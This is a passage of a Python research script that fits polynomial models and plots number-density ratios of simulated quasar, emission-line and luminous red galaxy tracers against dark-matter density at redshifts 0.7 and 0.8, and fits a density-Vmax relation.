N0qsoz08R = n.array([N0qsoz08[ii::NR] for ii in range(NR)]).sum(axis=0)
N0qsoz08R_sig = n.array([N0qsoz08[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz08R[1:]+binsz08R[:-1])/2.
dxR = binsz08R[1:] - binsz08R[:-1]
# relative error on y in percentage
errPoisson = N0qsoz08T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0qsoz08T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0qsoz08R_sig)
ok = (N0qsoz08>0)&(N0z08>0)&(N0qsoz08/N0z08>-6)#&(xb>10**2)
y = n.log10(N0qsoz08[ok]/N0z08[ok])
yplus = n.log10((N0qsoz08[ok] + errorsP(xb[ok])*N0qsoz08[ok] )/N0z08[ok])
yminus = n.log10((N0qsoz08[ok] - errorsP(xb[ok])*N0qsoz08[ok] )/N0z08[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('QSO ')#+str(ps))
p.plot(xb, N0qsoz08/N0z08,'kx', rasterized=True, label='z=0.8')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2,label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z08-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('QSO')#+str(n.round(ps,5)))
p.plot(xb, (N0qsoz08/N0z08)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.8')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z08-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-QSO-z08.data",ps)
########## FIT z=0.8 ELG
NR = 5
N0z08R = n.array([N0z08[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz08R = binsz08[::NR]
N0elgz08R = n.array([N0elgz08[ii::NR] for ii in range(NR)]).sum(axis=0)
N0elgz08R_sig = n.array([N0elgz08[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz08R[1:]+binsz08R[:-1])/2.
dxR = binsz08R[1:] - binsz08R[:-1]
# relative error on y in percentage
errPoisson = N0elgz08T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0elgz08T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0elgz08R_sig)
ok = (N0elgz08>0)&(N0z08>0)&(N0elgz08/N0z08>-6)#&(xb>10**2)
y = n.log10(N0elgz08[ok]/N0z08[ok])
yplus = n.log10((N0elgz08[ok] + errorsP(xb[ok])*N0elgz08[ok] )/N0z08[ok])
yminus = n.log10((N0elgz08[ok] - errorsP(xb[ok])*N0elgz08[ok] )/N0z08[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('ELG ')#+str(ps))
p.plot(xb, N0elgz08/N0z08,'kx', rasterized=True, label='z=0.8')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2,label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-ELG-z08-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('ELG')#+str(n.round(ps,5)))
p.plot(xb, (N0elgz08/N0z08)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.8')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-ELG-z08-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-ELG-z08.data",ps)
sys.exit()
########## FIT z=0.7 LRG
NR = 5
N0z07R = n.array([N0z07[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz07R = binsz07[::NR]
N0lrgz07R = n.array([N0lrgz07[ii::NR] for ii in range(NR)]).sum(axis=0)
N0lrgz07R_sig = n.array([N0lrgz07[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz07R[1:]+binsz07R[:-1])/2.
dxR = binsz07R[1:] - binsz07R[:-1]
# relative error on y in percentage
errPoisson = N0lrgz07T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0lrgz07T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0lrgz07R_sig)
ok = (N0lrgz07>0)&(N0z07>0)&(N0lrgz07/N0z07>-6)#&(xb>10**2)
y = n.log10(N0lrgz07[ok]/N0z07[ok])
yplus = n.log10((N0lrgz07[ok] + errorsP(xb[ok])*N0lrgz07[ok] )/N0z07[ok])
yminus = n.log10((N0lrgz07[ok] - errorsP(xb[ok])*N0lrgz07[ok] )/N0z07[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('LRG ')#+str(ps))
p.plot(xb, N0lrgz07/N0z07,'kx', rasterized=True, label='z=0.7')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2, label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-LRG-z07-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('LRG')#+str(n.round(ps,5)))
p.plot(xb, (N0lrgz07/N0z07)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.7')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-LRG-z07-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-LRG-z07.data",ps)
########## FIT z=0.7 QSO
NR = 5
N0z07R = n.array([N0z07[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz07R = binsz07[::NR]
N0qsoz07R = n.array([N0qsoz07[ii::NR] for ii in range(NR)]).sum(axis=0)
N0qsoz07R_sig = n.array([N0qsoz07[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz07R[1:]+binsz07R[:-1])/2.
dxR = binsz07R[1:] - binsz07R[:-1]
# relative error on y in percentage
errPoisson = N0qsoz07T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0qsoz07T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0qsoz07R_sig)
ok = (N0qsoz07>0)&(N0z07>0)&(N0qsoz07/N0z07>-6)#&(xb>10**2)
y = n.log10(N0qsoz07[ok]/N0z07[ok])
yplus = n.log10((N0qsoz07[ok] + errorsP(xb[ok])*N0qsoz07[ok] )/N0z07[ok])
yminus = n.log10((N0qsoz07[ok] - errorsP(xb[ok])*N0qsoz07[ok] )/N0z07[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('QSO ')#+str(ps))
p.plot(xb, N0qsoz07/N0z07,'kx', rasterized=True, label='z=0.7')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2,label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z07-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('QSO')#+str(n.round(ps,5)))
p.plot(xb, (N0qsoz07/N0z07)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.7')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-QSO-z07-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-QSO-z07.data",ps)
########## FIT z=0.7 ELG
NR = 5
N0z07R = n.array([N0z07[ii::NR] for ii in range(NR)]).sum(axis=0)
binsz07R = binsz07[::NR]
N0elgz07R = n.array([N0elgz07[ii::NR] for ii in range(NR)]).sum(axis=0)
N0elgz07R_sig = n.array([N0elgz07[ii::NR] for ii in range(NR)]).std(axis=0)
xbR = (binsz07R[1:]+binsz07R[:-1])/2.
dxR = binsz07R[1:] - binsz07R[:-1]
# relative error on y in percentage
errPoisson = N0elgz07T**(-0.5)
errorsP = interp1d(xb, errPoisson)
# absolute error on y
errPoissonA = N0elgz07T**(0.5)
errorsPA = interp1d(xb, errPoissonA)
errors = interp1d(xbR, N0elgz07R_sig)
ok = (N0elgz07>0)&(N0z07>0)&(N0elgz07/N0z07>-6)#&(xb>10**2)
y = n.log10(N0elgz07[ok]/N0z07[ok])
yplus = n.log10((N0elgz07[ok] + errorsP(xb[ok])*N0elgz07[ok] )/N0z07[ok])
yminus = n.log10((N0elgz07[ok] - errorsP(xb[ok])*N0elgz07[ok] )/N0z07[ok])
x = n.log10(xb[ok])
yerr = errorsP(10**x) * y
ps = n.polyfit(x, y, 11, w = 1./(errPoisson[ok]))
p.figure(0)
p.title('ELG ')#+str(ps))
p.plot(xb, N0elgz07/N0z07,'kx', rasterized=True, label='z=0.7')
p.plot(xb, 10**n.polyval(ps, n.log10(xb)), 'm--', lw=2,label='fit')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-10, 1e1))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-ELG-z07-delta-HDF0-model.png"))
p.clf()
p.figure(0)
p.title('ELG')#+str(n.round(ps,5)))
p.plot(xb, (N0elgz07/N0z07)/(10**n.polyval(ps, n.log10(xb))),'kx', rasterized=True, label='z=0.7')
p.plot(xb,1+errPoisson, 'r--')
p.plot(xb,1-errPoisson, 'r--')
p.plot(10**x, 10**(yplus-y), 'r--')
p.plot(10**x, 10**(-yminus+y), 'r--',label='poisson error')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N / N model')
p.xscale('log')
p.ylim((0.5, 1.5))
p.xlim((0.1, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","fit-ELG-z07-delta-HDF0-ratio.png"))
p.clf()
n.savetxt("fit-polynomial-ELG-z07.data",ps)
sys.exit()
#########################################
#########################################
#########################################
#Z=0.8
#########################################
#########################################
#########################################
#########################################
#########################################
#########################################
#Z=0.8
#########################################
#########################################
#########################################
inGal = n.array([ "Box_HAM_z1.480160_nbar1.930000e-05_QSO.DF.fits.gz" ])
inGal = n.array([ "Box_HAM_z0.818843_nbar1.680000e-05_QSO.DF.fits.gz", "Box_HAM_z0.818843_nbar3.200000e-04_ELG.DF.fits.gz" ])
Hqso, N0qso, N1qso = getNN(join( mockDir,inGal[0]))
Helg, N0elg, N1elg = getNN(join( mockDir,inGal[1]))
xs, Hs = smooth(H)
xs, Hselg = smooth(Helg)
xs, Hsqso = smooth(Hqso)
X, Y = n.meshgrid(xb[::4], xb[::4]) #xs,xs)
n.savetxt(join(mockDir,"grid-x-z08.data"), X)
n.savetxt(join(mockDir,"grid-y-z08.data"), Y)
Z = Hsqso.astype('float')/Hs
bad = (Z<0)|(n.isnan(Z))|(Z==n.inf)
Z[bad]=n.zeros_like(Z)[bad]
n.savetxt(join(mockDir,"qso-z08.data"), Z)
Z = Hselg.astype('float')/Hs
bad = (Z<0)|(n.isnan(Z))|(Z==n.inf)
Z[bad]=n.zeros_like(Z)[bad]
n.savetxt(join(mockDir,"elg-z08.data"), Z)
Z=n.log10(Hsqso.astype('float')/Hs)
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, Z)#, levels=n.arange(-3,0.26,0.25))
cb = p.colorbar()
cb.set_label(r'log(N(QSO)/N(all))')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$\delta_0$')
p.ylim((0.1, 5000))
p.xlim((0.1, 5000))
p.xscale('log')
p.yscale('log')
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-HDF1-z08-qso.png"))
p.clf()
Z=n.log10(Hselg.astype('float')/Hs)
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, Z)#, levels=n.arange(-3,0.26,0.25))
cb = p.colorbar()
cb.set_label(r'log(N(ELG)/N(all)')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$\delta_0$')
p.ylim((0.1, 5000))
p.xlim((0.1, 5000))
p.xscale('log')
p.yscale('log')
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-HDF1-z08-elg.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N0qso/N0,'gx', rasterized=True, label='QSO ')
p.plot(xb, N0elg/N0,'bx', rasterized=True, label='ELG ')
p.plot(xb, 5e-6 * xb**(2.1), 'k--' , label=r'$5\times10^{-6}\delta_0^2.1$')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-8, 1e1))
p.xlim((0.01, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-z08-ratio.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N1qso/N1,'gx', rasterized=True, label='QSO ')
p.plot(xb, N1elg/N1,'bx', rasterized=True, label='ELG ')
p.plot(xb, 5e-6 * xb**(2.1), 'k--' , label=r'$5\times10^{-6}\delta_0^2.1$')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_1$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-8, 1e1))
p.xlim((0.01, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF1-z08-ratio.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N0,'kx', rasterized=True, label=r'MDPL 2048$^3$')
p.plot(xb, N0qso,'gx', rasterized=True, label='QSO ')
p.plot(xb, N0elg,'bx', rasterized=True, label='ELG ')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'$N/Mpc3/d\delta$')
p.xscale('log')
p.yscale('log')
p.ylim((1e-11, 1e2))
p.xlim((0.01, 1e4))
gl = p.legend()
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-z08.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N1,'kx', rasterized=True, label=r'MDPL 2048$^3$')
p.plot(xb, N1qso,'gx', rasterized=True, label='QSO ')
p.plot(xb, N1elg,'bx', rasterized=True, label='ELG ')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$N/Mpc3/d\delta$')
p.xscale('log')
p.yscale('log')
p.ylim((1e-11, 1e2))
p.xlim((0.01, 1e4))
gl = p.legend()
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF1-z08.png"))
p.clf()
#########################################
#########################################
#########################################
#Z=0.7
#########################################
#########################################
#########################################
inGal = n.array([ "Box_HAM_z0.818843_nbar1.000000e-04_LRG.DF.fits.gz", "Box_HAM_z0.818843_nbar1.680000e-05_QSO.DF.fits.gz", "Box_HAM_z0.818843_nbar3.200000e-04_ELG.DF.fits.gz" ])
Hlrg, N0lrg, N1lrg = getNN(join( mockDir,inGal[0]))
Hqso, N0qso, N1qso = getNN(join( mockDir,inGal[1]))
Helg, N0elg, N1elg = getNN(join( mockDir,inGal[2]))
xs, Hs = smooth(H)
xs, Hslrg = smooth(Hlrg)
xs, Hselg = smooth(Helg)
xs, Hsqso = smooth(Hqso)
X, Y = n.meshgrid(xb[::4], xb[::4]) #xs,xs)
n.savetxt(join(mockDir,"grid-x-z07.data"), X)
n.savetxt(join(mockDir,"grid-y-z07.data"), Y)
Z = Hsqso.astype('float')/Hs
bad = (Z<0)|(n.isnan(Z))|(Z==n.inf)
Z[bad]=n.zeros_like(Z)[bad]
n.savetxt(join(mockDir,"qso-z07.data"), Z)
Z = Hslrg.astype('float')/Hs
bad = (Z<0)|(n.isnan(Z))|(Z==n.inf)
Z[bad]=n.zeros_like(Z)[bad]
n.savetxt(join(mockDir,"lrg-z07.data"), Z)
Z = Hselg.astype('float')/Hs
bad = (Z<0)|(n.isnan(Z))|(Z==n.inf)
Z[bad]=n.zeros_like(Z)[bad]
n.savetxt(join(mockDir,"elg-z07.data"), Z)
Z=n.log10(Hsqso.astype('float')/Hs)
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, Z)#, levels=n.arange(-3,0.26,0.25))
cb = p.colorbar()
cb.set_label(r'log(N(QSO)/N(all))')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$\delta_0$')
p.ylim((0.1, 5000))
p.xlim((0.1, 5000))
p.xscale('log')
p.yscale('log')
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-HDF1-z07-qso.png"))
p.clf()
Z=n.log10(Hselg.astype('float')/Hs)
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, Z)#, levels=n.arange(-3,0.26,0.25))
cb = p.colorbar()
cb.set_label(r'log(N(ELG)/N(all)')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$\delta_0$')
p.ylim((0.1, 5000))
p.xlim((0.1, 5000))
p.xscale('log')
p.yscale('log')
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-HDF1-z07-elg.png"))
p.clf()
Z=n.log10(Hslrg.astype('float')/Hs)
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, Z)#, levels=n.arange(-3,0.26,0.25))
cb = p.colorbar()
cb.set_label(r'log(N(LRG)/N(all)')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$\delta_0$')
p.ylim((0.1, 5000))
p.xlim((0.1, 5000))
p.xscale('log')
p.yscale('log')
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-HDF1-z07-lrg.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N0qso/N0,'gx', rasterized=True, label='QSO ')
p.plot(xb, N0lrg/N0,'rx', rasterized=True, label='LRG ')
p.plot(xb, N0elg/N0,'bx', rasterized=True, label='ELG ')
p.plot(xb, 5e-6 * xb**(2.1), 'k--' , label=r'$5\times10^{-6}\delta_0^2.1$')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-8, 1e1))
p.xlim((0.01, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-z07-ratio.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N1qso/N1,'gx', rasterized=True, label='QSO ')
p.plot(xb, N1lrg/N1,'rx', rasterized=True, label='LRG ')
p.plot(xb, N1elg/N1,'bx', rasterized=True, label='ELG ')
p.plot(xb, 5e-6 * xb**(2.1), 'k--' , label=r'$5\times10^{-6}\delta_0^2.1$')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_1$')
p.ylabel(r'N/ N total')
p.xscale('log')
p.yscale('log')
p.ylim((1e-8, 1e1))
p.xlim((0.01, 1e4))
gl = p.legend(loc=2)
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF1-z07-ratio.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N0,'kx', rasterized=True, label=r'MDPL 2048$^3$')
p.plot(xb, N0qso,'gx', rasterized=True, label='QSO ')
p.plot(xb, N0lrg,'rx', rasterized=True, label='LRG ')
p.plot(xb, N0elg,'bx', rasterized=True, label='ELG ')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_0$')
p.ylabel(r'$N/Mpc3/d\delta$')
p.xscale('log')
p.yscale('log')
p.ylim((1e-11, 1e2))
p.xlim((0.01, 1e4))
gl = p.legend()
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF0-z07.png"))
p.clf()
p.figure(0)
p.title('z=0.7')
p.plot(xb, N1,'kx', rasterized=True, label=r'MDPL 2048$^3$')
p.plot(xb, N1qso,'gx', rasterized=True, label='QSO ')
p.plot(xb, N1lrg,'rx', rasterized=True, label='LRG ')
p.plot(xb, N1elg,'bx', rasterized=True, label='ELG ')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta_1$')
p.ylabel(r'$N/Mpc3/d\delta$')
p.xscale('log')
p.yscale('log')
p.ylim((1e-11, 1e2))
p.xlim((0.01, 1e4))
gl = p.legend()
gl.set_frame_on(False)
p.grid()
p.savefig(join(mockDir,"plots","delta-HDF1-z07.png"))
p.clf()
sys.exit()
# definitions for the axes
left, width = 0.1, 0.65
bottom, height = 0.1, 0.65
bottom_h = left_h = left + width + 0.02
rect_scatter = [left, bottom, width, height]
rect_histx = [left, bottom_h, width, 0.2]
rect_histy = [left_h, bottom, 0.2, height]
# start with a rectangular Figure
p.figure(1, figsize=(8, 8))
p.contourf(X, Y, proba)
p.xlabel('DF N1')
p.ylabel('DF')
p.xscale('log')
p.yscale('log')
p.show()
p.figure(1, figsize=(8, 8))
axScatter = p.axes(rect_scatter)
axScatter.set_yscale('log')
axScatter.set_xscale('log')
extent = [yedges[0], yedges[-1], xedges[0], xedges[-1]]
levels = (0.01, 0.1, 0.5, 1)
cset = p.contour(X, Y, proba, levels, origin='lower',colors=['black','green','blue','red'],linewidths=(1.9, 1.6, 1.5, 1.4),extent=extent)
p.clabel(cset, inline=1, fontsize=10, fmt='%1.0i')
for c in cset.collections:
c.set_linestyle('solid')
p.xlabel('DF N1')
p.ylabel('DF')
axHistx = p.axes(rect_histx)
axHisty = p.axes(rect_histy)
# no labels
axHistx.xaxis.set_major_formatter(nullfmt)
axHisty.yaxis.set_major_formatter(nullfmt)
# the scatter plot:
axHistx.plot(xb, HDF1, 'k')
axHistx.plot(xb, HDF1qso, 'b')
axHistx.set_yscale('log')
axHistx.set_xscale('log')
axHisty.plot(xb, HDF0, 'r', orientation='horizontal')
axHisty.plot(xb, HDF0qso, 'g', orientation='horizontal')
axHisty.set_yscale('log')
p.show()
p.imshow(n.log10(proba))
p.colorbar()
p.show()
dxAll = binsAll[1:] - binsAll[:-1]
xAll = (binsAll[1:]*binsAll[:-1])**0.5
NAll = result /dxAll / 1000**3.
nqso, binQSO = n.histogram(hd['DF'], bins= n.logspace(-1.5,4,80))
dxQso = binQSO[1:] - binQSO[:-1]
xQSO = (binQSO[1:]*binQSO[:-1])**0.5
NQSO = nqso /dxQso / 1000**3.
p.figure(0)
p.title('z=0.7')
p.plot(xAll, NAll,'kx', rasterized=True, label='MD Planck 1Gpc mesh 2048 cube')
p.plot(xQSO, NQSO,'bx', rasterized=True, label='QSO ')
p.axvline(0.4,label='0.4',c='r')
p.axvline(100,label='100', color='m')
p.xlabel(r'$\delta$')
p.ylabel(r'$N/Mpc3/d\delta$')
p.xscale('log')
p.yscale('log')
p.legend(loc= 3)
p.grid()
p.savefig(join(mockDir,"plots","delta-numberdensity-z07-fit.png"))
p.clf()
#################################################
#################################################
# delta - vmax relation
#################################################
#################################################
# for each bin in delta compute vmax mean and its std
pcs = [0, 1, 10, 20, 30, 40, 50, 60, 70, 80, 90, 99, 100]
bins = n.hstack((0,n.logspace(-3, 4, 60)))
vmaxBar = n.empty(len(bins)-1)
vmaxStd = n.empty(len(bins)-1)
distrib = n.empty((len(bins)-1, len(pcs)))
Nbins = 10
bbs = n.empty((len(bins)-1, Nbins+1))
N = n.empty((len(bins)-1, Nbins))
for ii in range(len(bins)-1):
sel = (hd['DF']>bins[ii]) & (hd['DF']<bins[ii+1])
y = hd['Vmax'][sel]
vmaxBar[ii], vmaxStd[ii], distrib[ii] = n.mean(y), n.std(y), sc(y,pcs)
N[ii],bbs[ii] = n.histogram(y, bins= Nbins )
ok = (vmaxBar>0)&(vmaxStd>0)&(bins[1:]>0.4)&(bins[:-1]<100)&(N.sum(axis=1)>100)
x = n.log10(1.+(bins[1:]*bins[:-1])**0.5)[ok]
y = n.log10(vmaxBar)[ok]
yerr = vmaxStd[ok] / vmaxBar[ok]
f= lambda x,a,b : a*x+b
out, cov = curve_fit(f, x, y, (1,0), yerr )
p.figure(0)
p.plot(n.log10(1+hd['DF']), n.log10(hd['Vmax']),'r.',alpha=0.1, label='QSO z=0.7',rasterized = True)
p.errorbar(x,y,yerr=yerr/2.,label='mean - std')
p.plot(x, f(x,out[0],out[1]),'k--',lw=2,label='fit y='+str(n.round(out[0],3))+'x+'+str(n.round(out[1],3)))
p.xlabel(r'$log_{10}(1+\delta)$')
p.ylabel(r'$log_{10}(V_{max})$')
p.legend(loc= 2)
p.grid()
p.savefig(join(mockDir,"plots","delta-vmax-qso-z07-fit.png"))
p.clf()
#log10(vmax) = 0.0973259*log10(1+delta) + 2.254723554
params = n.empty((len(bins[ok])-1,3))
paramsErr = n.empty((len(bins[ok])-1,3))
histBins = n.arange(-0.7, 0.71, 0.05)
p.figure(0, (12,8))
for jj in range(len(bins[ok])-1):
sel = (hd['DF']>bins[ok][jj]) & (hd['DF']<bins[ok][jj+1])
yDat= hd['Vmax'][sel]
#print jj, yDat
x1 = n.log10(yDat) - n.log10(n.mean(yDat))
counts, bs = n.histogram(x1, bins=histBins)
#print counts, bs
xx=(bs[1:]+bs[:-1])/2.
p.errorbar(xx,counts,yerr = counts**0.5 , label=r'$\delta\in$'+str(n.round(bins[ok][jj],2))+', '+str(n.round(bins[ok][jj+1],2)))
p.ylabel(r'counts')
p.xlabel(r'$log_{10}(V_{max})/\bar{V}$')
p.grid
p.xlim((-1, 1.3))
p.legend(fontsize=8)
p.savefig(join(mockDir,"plots","delta-vmaxHistPerDelta-qso-z07.png"))
p.clf()
xs = n.empty((len(bins[ok])-1, len(histBins)))
ys = n.empty((len(bins[ok])-1, len(histBins)-1))
p.figure(0, (12,8))
for jj in range(len(bins[ok])-1):
sel = (hd['DF']>bins[ok][jj]) & (hd['DF']<bins[ok][jj+1])
yDat= hd['Vmax'][sel]
#print jj, yDat
x1 = n.log10(yDat) - n.log10(n.mean(yDat))
counts, bs = n.histogram(x1, normed = True, bins = histBins)
#print counts, bs
xx=(bs[1:]+bs[:-1])/2.
p.plot(xx,counts, ls='--',lw=0.5, label=r'$\delta\in$'+str(n.round(bins[ok][jj],2))+', '+str(n.round(bins[ok][jj+1],2)))
ys[jj] = counts
xs[jj] = bs
Xbin=bs # n.mean(xs,axis=0)
X=(Xbin[1:]+Xbin[:-1])/2.
Y=n.mean(ys,axis=0)
YERR=n.std(ys,axis=0)
p.errorbar(X,Y, yerr = YERR, lw=2)
p.ylabel(r'counts')
p.xlabel(r'$log_{10}(V_{max})/\bar{V}$')
p.grid()
p.xlim((-1, 1.3))
p.legend(fontsize=8)
p.savefig(join(mockDir,"plots","delta-vmaxHistPerDeltaNormed-qso-z07.png"))
p.clf()
g = lambda var, sig, A, mu : A *n.e**(- (var- mu)**2./ (2*sig**2.))
positive= (Y>0)&(YERR>0)
out2, cov2 = curve_fit(g, X[positive], Y[positive], (0.12, n.max(Y), -0.025), YERR[positive])# , maxfev = 5000)
#g = lambda var, sig, A : A *n.e**(- (var+0.025)**2./ (2*sig**2.))
